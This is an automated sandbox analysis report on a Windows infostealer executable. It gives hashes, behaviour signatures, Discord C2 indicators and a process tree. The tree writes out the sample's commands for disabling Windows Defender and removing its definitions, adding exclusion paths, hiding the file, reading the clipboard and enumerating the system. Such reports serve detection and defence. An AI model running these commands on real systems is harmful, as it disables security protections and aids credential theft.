946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 02:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
Size

5.9MB
MD5

82783812e82bd062967d473332b45f93
SHA1

c7f991ed9a50a837e19c26fa3ef45ad24228495b
SHA256

946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a
SHA512

459b03f4f0342422144c08e81a9ee3c6940b4c894b7b5c7f42e37bd9fae81ba1015999574ab3a554a81466e7569d3e81aee11afc1d8f9bfcb9d3c5d6ee7d9c94
SSDEEP

98304:0rTzvMhjdOUei65sn6Wfz7pnxCMJk1JTxuZ3zEgyOFRyn26iI2kr2b4pnjZpbR:0rTY0DOYMJeJT44xn26T2CHnNVR

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2364 powershell.exe
1984 powershell.exe
2644 powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exe946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

Processes:

rar.exe

pid process

2436 rar.exe

pid	process
2436	rar.exe

Loads dropped DLL 17 IoCs

Processes:

946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe

pid	process
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI19002\python310.dll	upx
behavioral2/memory/912-25-0x00007FFF11070000-0x00007FFF114D2000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\libffi-7.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_ssl.pyd	upx
behavioral2/memory/912-48-0x00007FFF26120000-0x00007FFF2612F000-memory.dmp	upx
behavioral2/memory/912-47-0x00007FFF20D90000-0x00007FFF20DB4000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19002\libcrypto-1_1.dll	upx
behavioral2/memory/912-54-0x00007FFF20730000-0x00007FFF2075C000-memory.dmp	upx
behavioral2/memory/912-56-0x00007FFF20D70000-0x00007FFF20D88000-memory.dmp	upx
behavioral2/memory/912-58-0x00007FFF206A0000-0x00007FFF206BE000-memory.dmp	upx
behavioral2/memory/912-60-0x00007FFF10CA0000-0x00007FFF10E11000-memory.dmp	upx
behavioral2/memory/912-64-0x00007FFF20670000-0x00007FFF2067D000-memory.dmp	upx
behavioral2/memory/912-63-0x00007FFF20680000-0x00007FFF20699000-memory.dmp	upx
behavioral2/memory/912-68-0x00007FFF10BE0000-0x00007FFF10C97000-memory.dmp	upx
behavioral2/memory/912-71-0x00007FFF10860000-0x00007FFF10BD7000-memory.dmp	upx
behavioral2/memory/912-67-0x00007FFF204F0000-0x00007FFF2051E000-memory.dmp	upx
behavioral2/memory/912-74-0x00007FFF1FED0000-0x00007FFF1FEE5000-memory.dmp	upx
behavioral2/memory/912-77-0x00007FFF1FE80000-0x00007FFF1FE8D000-memory.dmp	upx
behavioral2/memory/912-76-0x00007FFF11070000-0x00007FFF114D2000-memory.dmp	upx
behavioral2/memory/912-79-0x00007FFF20D90000-0x00007FFF20DB4000-memory.dmp	upx
behavioral2/memory/912-80-0x00007FFF103D0000-0x00007FFF104E8000-memory.dmp	upx
behavioral2/memory/912-271-0x00007FFF206A0000-0x00007FFF206BE000-memory.dmp	upx
behavioral2/memory/912-283-0x00007FFF20D90000-0x00007FFF20DB4000-memory.dmp	upx
behavioral2/memory/912-297-0x00007FFF10CA0000-0x00007FFF10E11000-memory.dmp	upx
behavioral2/memory/912-292-0x00007FFF10BE0000-0x00007FFF10C97000-memory.dmp	upx
behavioral2/memory/912-291-0x00007FFF204F0000-0x00007FFF2051E000-memory.dmp	upx
behavioral2/memory/912-289-0x00007FFF20680000-0x00007FFF20699000-memory.dmp	upx
behavioral2/memory/912-282-0x00007FFF11070000-0x00007FFF114D2000-memory.dmp	upx
behavioral2/memory/912-293-0x00007FFF10860000-0x00007FFF10BD7000-memory.dmp	upx
behavioral2/memory/912-312-0x00007FFF103D0000-0x00007FFF104E8000-memory.dmp	upx
behavioral2/memory/912-318-0x00007FFF206A0000-0x00007FFF206BE000-memory.dmp	upx
behavioral2/memory/912-323-0x00007FFF10BE0000-0x00007FFF10C97000-memory.dmp	upx
behavioral2/memory/912-322-0x00007FFF204F0000-0x00007FFF2051E000-memory.dmp	upx
behavioral2/memory/912-321-0x00007FFF20670000-0x00007FFF2067D000-memory.dmp	upx
behavioral2/memory/912-320-0x00007FFF20680000-0x00007FFF20699000-memory.dmp	upx
behavioral2/memory/912-319-0x00007FFF10CA0000-0x00007FFF10E11000-memory.dmp	upx
behavioral2/memory/912-317-0x00007FFF20D70000-0x00007FFF20D88000-memory.dmp	upx
behavioral2/memory/912-316-0x00007FFF20730000-0x00007FFF2075C000-memory.dmp	upx
behavioral2/memory/912-315-0x00007FFF26120000-0x00007FFF2612F000-memory.dmp	upx
behavioral2/memory/912-314-0x00007FFF20D90000-0x00007FFF20DB4000-memory.dmp	upx
behavioral2/memory/912-313-0x00007FFF11070000-0x00007FFF114D2000-memory.dmp	upx
behavioral2/memory/912-309-0x00007FFF10860000-0x00007FFF10BD7000-memory.dmp	upx
behavioral2/memory/912-311-0x00007FFF1FE80000-0x00007FFF1FE8D000-memory.dmp	upx
behavioral2/memory/912-310-0x00007FFF1FED0000-0x00007FFF1FEE5000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

23 discord.com
24 discord.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
21 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exe

pid process

2704 WMIC.exe
2056 WMIC.exe
4072 WMIC.exe
Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3188 tasklist.exe
1020 tasklist.exe
3952 tasklist.exe
3292 tasklist.exe
3256 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2404 systeminfo.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2308 PING.EXE

flow	ioc
23	discord.com
24	discord.com

flow	ioc
13	ip-api.com
21	ip-api.com

pid	process
2704	WMIC.exe
2056	WMIC.exe
4072	WMIC.exe

pid	process
3188	tasklist.exe
1020	tasklist.exe
3952	tasklist.exe
3292	tasklist.exe
3256	tasklist.exe

pid	process
2404	systeminfo.exe

pid	process
2308	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2364	powershell.exe
2364	powershell.exe
3000	powershell.exe
3000	powershell.exe
2364	powershell.exe
3000	powershell.exe
1984	powershell.exe
1984	powershell.exe
1984	powershell.exe
800	powershell.exe
800	powershell.exe
2644	powershell.exe
2644	powershell.exe
800	powershell.exe
2644	powershell.exe
2268	powershell.exe
2268	powershell.exe
2268	powershell.exe
2764	powershell.exe
2764	powershell.exe
2764	powershell.exe
3456	powershell.exe
3456	powershell.exe
3268	powershell.exe
3268	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exepowershell.exepowershell.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3952	tasklist.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeIncreaseQuotaPrivilege	4528	WMIC.exe
Token: SeSecurityPrivilege	4528	WMIC.exe
Token: SeTakeOwnershipPrivilege	4528	WMIC.exe
Token: SeLoadDriverPrivilege	4528	WMIC.exe
Token: SeSystemProfilePrivilege	4528	WMIC.exe
Token: SeSystemtimePrivilege	4528	WMIC.exe
Token: SeProfSingleProcessPrivilege	4528	WMIC.exe
Token: SeIncBasePriorityPrivilege	4528	WMIC.exe
Token: SeCreatePagefilePrivilege	4528	WMIC.exe
Token: SeBackupPrivilege	4528	WMIC.exe
Token: SeRestorePrivilege	4528	WMIC.exe
Token: SeShutdownPrivilege	4528	WMIC.exe
Token: SeDebugPrivilege	4528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4528	WMIC.exe
Token: SeRemoteShutdownPrivilege	4528	WMIC.exe
Token: SeUndockPrivilege	4528	WMIC.exe
Token: SeManageVolumePrivilege	4528	WMIC.exe
Token: 33	4528	WMIC.exe
Token: 34	4528	WMIC.exe
Token: 35	4528	WMIC.exe
Token: 36	4528	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4528	WMIC.exe
Token: SeSecurityPrivilege	4528	WMIC.exe
Token: SeTakeOwnershipPrivilege	4528	WMIC.exe
Token: SeLoadDriverPrivilege	4528	WMIC.exe
Token: SeSystemProfilePrivilege	4528	WMIC.exe
Token: SeSystemtimePrivilege	4528	WMIC.exe
Token: SeProfSingleProcessPrivilege	4528	WMIC.exe
Token: SeIncBasePriorityPrivilege	4528	WMIC.exe
Token: SeCreatePagefilePrivilege	4528	WMIC.exe
Token: SeBackupPrivilege	4528	WMIC.exe
Token: SeRestorePrivilege	4528	WMIC.exe
Token: SeShutdownPrivilege	4528	WMIC.exe
Token: SeDebugPrivilege	4528	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4528	WMIC.exe
Token: SeRemoteShutdownPrivilege	4528	WMIC.exe
Token: SeUndockPrivilege	4528	WMIC.exe
Token: SeManageVolumePrivilege	4528	WMIC.exe
Token: 33	4528	WMIC.exe
Token: 34	4528	WMIC.exe
Token: 35	4528	WMIC.exe
Token: 36	4528	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4072	WMIC.exe
Token: SeSecurityPrivilege	4072	WMIC.exe
Token: SeTakeOwnershipPrivilege	4072	WMIC.exe
Token: SeLoadDriverPrivilege	4072	WMIC.exe
Token: SeSystemProfilePrivilege	4072	WMIC.exe
Token: SeSystemtimePrivilege	4072	WMIC.exe
Token: SeProfSingleProcessPrivilege	4072	WMIC.exe
Token: SeIncBasePriorityPrivilege	4072	WMIC.exe
Token: SeCreatePagefilePrivilege	4072	WMIC.exe
Token: SeBackupPrivilege	4072	WMIC.exe
Token: SeRestorePrivilege	4072	WMIC.exe
Token: SeShutdownPrivilege	4072	WMIC.exe
Token: SeDebugPrivilege	4072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4072	WMIC.exe
Token: SeRemoteShutdownPrivilege	4072	WMIC.exe
Token: SeUndockPrivilege	4072	WMIC.exe
Token: SeManageVolumePrivilege	4072	WMIC.exe
Token: 33	4072	WMIC.exe
Token: 34	4072	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1900 wrote to memory of 912	1900	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
PID 1900 wrote to memory of 912	1900	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
PID 912 wrote to memory of 5068	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 5068	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3076	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3076	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 2308	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 2308	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 2236	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 2236	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3856	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3856	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 3076 wrote to memory of 3000	3076	cmd.exe	powershell.exe
PID 3076 wrote to memory of 3000	3076	cmd.exe	powershell.exe
PID 5068 wrote to memory of 2364	5068	cmd.exe	powershell.exe
PID 5068 wrote to memory of 2364	5068	cmd.exe	powershell.exe
PID 2236 wrote to memory of 3952	2236	cmd.exe	tasklist.exe
PID 2236 wrote to memory of 3952	2236	cmd.exe	tasklist.exe
PID 2308 wrote to memory of 5036	2308	cmd.exe	mshta.exe
PID 2308 wrote to memory of 5036	2308	cmd.exe	mshta.exe
PID 3856 wrote to memory of 4528	3856	cmd.exe	WMIC.exe
PID 3856 wrote to memory of 4528	3856	cmd.exe	WMIC.exe
PID 912 wrote to memory of 3604	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3604	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 3604 wrote to memory of 3320	3604	cmd.exe	reg.exe
PID 3604 wrote to memory of 3320	3604	cmd.exe	reg.exe
PID 912 wrote to memory of 5100	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 5100	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 5100 wrote to memory of 3080	5100	cmd.exe	reg.exe
PID 5100 wrote to memory of 3080	5100	cmd.exe	reg.exe
PID 912 wrote to memory of 1852	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 1852	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 1852 wrote to memory of 4072	1852	cmd.exe	tree.com
PID 1852 wrote to memory of 4072	1852	cmd.exe	tree.com
PID 912 wrote to memory of 3408	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3408	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 3408 wrote to memory of 2704	3408	cmd.exe	WMIC.exe
PID 3408 wrote to memory of 2704	3408	cmd.exe	WMIC.exe
PID 912 wrote to memory of 4308	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 4308	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 4500	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 4500	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 4500 wrote to memory of 1984	4500	cmd.exe	powershell.exe
PID 4500 wrote to memory of 1984	4500	cmd.exe	powershell.exe
PID 4308 wrote to memory of 2904	4308	cmd.exe	WaaSMedicAgent.exe
PID 4308 wrote to memory of 2904	4308	cmd.exe	WaaSMedicAgent.exe
PID 912 wrote to memory of 208	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 208	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 5000	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 5000	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 208 wrote to memory of 3292	208	cmd.exe	tasklist.exe
PID 208 wrote to memory of 3292	208	cmd.exe	tasklist.exe
PID 912 wrote to memory of 2516	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 2516	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3068	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3068	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3988	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3988	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 3456	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	attrib.exe
PID 912 wrote to memory of 3456	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	attrib.exe
PID 912 wrote to memory of 1060	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 1060	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 4228	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe
PID 912 wrote to memory of 4228	912	946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe	cmd.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

2904 attrib.exe
2328 attrib.exe
3456 attrib.exe

pid	process
2904	attrib.exe
2328	attrib.exe
3456	attrib.exe

C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
"C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1900

C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
"C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"
2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe'"
3⤵
- Suspicious use of WriteProcessMemory
PID:5068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
- Suspicious use of WriteProcessMemory
PID:3076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('enter the key', 0, 'key ', 32+16);close()""
3⤵
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('enter the key', 0, 'key ', 32+16);close()"
4⤵
PID:5036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
3⤵
- Suspicious use of WriteProcessMemory
PID:3604

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
4⤵
PID:3320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
3⤵
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
4⤵
PID:3080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:2704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"
4⤵
- Views/modifies file attributes
PID:2904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'"
3⤵
- Suspicious use of WriteProcessMemory
PID:4500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:208

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:3292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5000

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:3256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:2516

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:800

C:\Windows\system32\cmd.exe
